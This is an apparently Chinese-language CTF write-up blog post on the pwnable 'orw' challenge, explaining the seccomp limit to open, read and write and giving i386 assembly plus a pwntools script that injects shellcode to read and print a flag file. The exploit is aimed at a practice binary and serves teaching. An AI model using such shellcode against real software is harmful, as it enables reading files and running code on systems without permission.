(Shellcode)pwnable_orw

Stack/Basic

 2023/10/31 

（原来还有orw这个东西

[shellcode]pwnable_orw

int __cdecl main(int argc, const char **argv, const char **envp)
{
  orw_seccomp();
  printf("Give my your shellcode:");
  read(0, &shellcode, 0xC8u);
  ((void (*)(void))shellcode)();
  return 0;
}

1.他有seccomp() 限制程序可以call的函数只有open read write 2.程序没开nx 那么可以ret2shellcode 对于orw在ret2shellcode时有着较为固定的流程

sys_open(flag,0,0)

push 0x0  			#字符串结尾
push 0x67616c66		#'flag'  "flag字符串的16进制表示，由于小端序，所以是从右往左"
mov ebx,esp			#ebx是flag参数 定位到刚刚push的栈顶进行传参
xor ecx,ecx			#0
xor edx,edx			#0
mov eax,0x5			#调用号
int 0x80			#sys_open(flags,0,0)

sys_read(3,flag,0x100)

mov eax,0x3; 
mov ecx,ebx;	# ecx = char __user *buf 缓冲区，读出的数据-->也就是读“flag”
mov ebx,0x3;	# 文件描述符 fd:是文件描述符 0 1 2 3 代表标准的输出输入和出错,其他打开的文件
mov edx,0x100;	#对应字节数
int 0x80;

sys_write(1,file,0x30)
mov eax,0x4;	# eax = sys_write
mov ebx,0x1;	# ebx = unsigned int fd = 1
int 0x80; #因为此时ecx在read时已经指向了 那么不用再赋值

关于系统调用可以用这个
<https://syscalls32.paolostivanin.com>
from pwn import *
from LibcSearcher import *

context(os = "linux", arch = "i386", log_level= "debug")
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
#p = remote("node3.buuoj.cn", 27008)

p = process('./orw')
gdb.attach(p)

shellcode = asm('push 0x0;push 0x67616c66;mov ebx,esp;xor ecx,ecx;xor edx,edx;mov eax,0x5;int 0x80')
shellcode+=asm('mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov edx,0x100;int 0x80')
shellcode+=asm('mov eax,0x4;mov ebx,0x1;int 0x80')

p.sendlineafter('shellcode:', shellcode)

p.interactive()

Author：Eureka

Link：https://dawoxiansigema.github.io/2023/10/31/pwnable-orw/

Publish date：October 31st 2023, 10:19:48 pm

Update date：November 1st 2023, 10:08:13 am

License：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

Next Post

(Srop&Ret2csu)CISCN_2019_s_3
Previous Post

(ret2syscall)ez_pz_hackover_2016

CATALOG

1. [shellcode]pwnable_orw